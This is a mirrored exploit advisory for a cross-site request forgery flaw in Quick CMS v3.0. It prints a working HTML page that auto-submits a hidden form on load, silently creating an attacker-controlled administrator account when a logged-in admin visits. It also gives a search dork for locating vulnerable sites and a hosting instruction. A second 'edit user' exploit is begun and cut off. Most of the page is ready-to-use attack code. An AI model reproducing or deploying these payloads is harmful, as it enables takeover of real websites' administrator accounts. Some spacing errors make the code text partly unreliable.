Quick. CMS v3. 0 CSRF flaws and fixes-vulnerability warning-the black bar safety net

2011-04-27T00:00:00
ID MYHACK58:62201130217
Type myhack58
Reporter 佚名
Modified 2011-04-27T00:00:00

Description

(+) Exploit Title: Quick CMS v3. 0 Cross Site Request Forgery (Add Admin User)

(+) Author : ^Xecuti0n3r

(+) E-mail : xecuti0n3r()yahoo.com

(+) Category : Web Apps [XSRF]

(+) Dork : intext:"Quick. Cms v3. 0" inurl:admin.php

(+) Demo CMS Link: http://opensolution.org/Quick.Cms

1 ######################################### 1

0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1

1 ######################################### 0

0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

All you have to do is save the below code as exploit.html

Then Host a website with the exploit.html file. A person with admin permissions if visits the site,

will automatically add the attacker as Admin without warning ;)



Code:

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>Quick CMS v3. 0 Cross Site Request Forgery (Add Admin User)</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

function fireForms()

{

var count = 2;

var i=0;

for(i=0; i<count; i++)

{

document. forms[i]. submit();

}

}

</script>

<H2>Quick CMS v3. 0 Cross Site Request Forgery (Add Admin User)</H2>

<form method="POST" name="form0" action="http://www.7747.net/admin.php?p=users-form&iUser=">

<input type="hidden" name="iUser" value=""/>

<input type="hidden" name="sLoginOld" value=""/>

<input type="hidden" name="sOptionList" value="save and go to the list ""/>

<input type="hidden" name="sLogin" value="admin3"/>

<input type="hidden" name="sPass" value="admin2"/>

<input type="hidden" name="sFirstName" value="Admin2"/>

<input type="hidden" name="sLastName" value="Admin2"/>

<input type="hidden" name="sCompanyName" value="ZZZZZ"/>

<input type="hidden" name="sStreet" value="ZZZZZZZZ"/>

<input type="hidden" name="sZipCode" value="9 9 9 9 9"/>

<input type="hidden" name="sCity" value="ZZZZZZ"/>

<input type="hidden" name="sPhone" value="9 9 9 9 9 9 9 9 9 3"/>

<input type="hidden" name="sEmail" value="attacker@jojo.com"/>

</form>

</form>

</body>

</html>

EDIT USER:

All you have to do is save the below code as exploit.html

Then Host a website with the exploit.html file. A person with admin permissions if visits the site,

will automatically add the attacker as Admin without warning ;)



Code:

<! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>

<head>

<title>Quick CMS v3. 0 Cross Site Request Forgery (Edit Existing Admin details)</title>

</head>

<body onload="javascript:fireForms()">

<script language="JavaScript">

function fireForms()

{

var count = 2;

var i=0;

for(i=0; i<count; i++)

[1] [2] next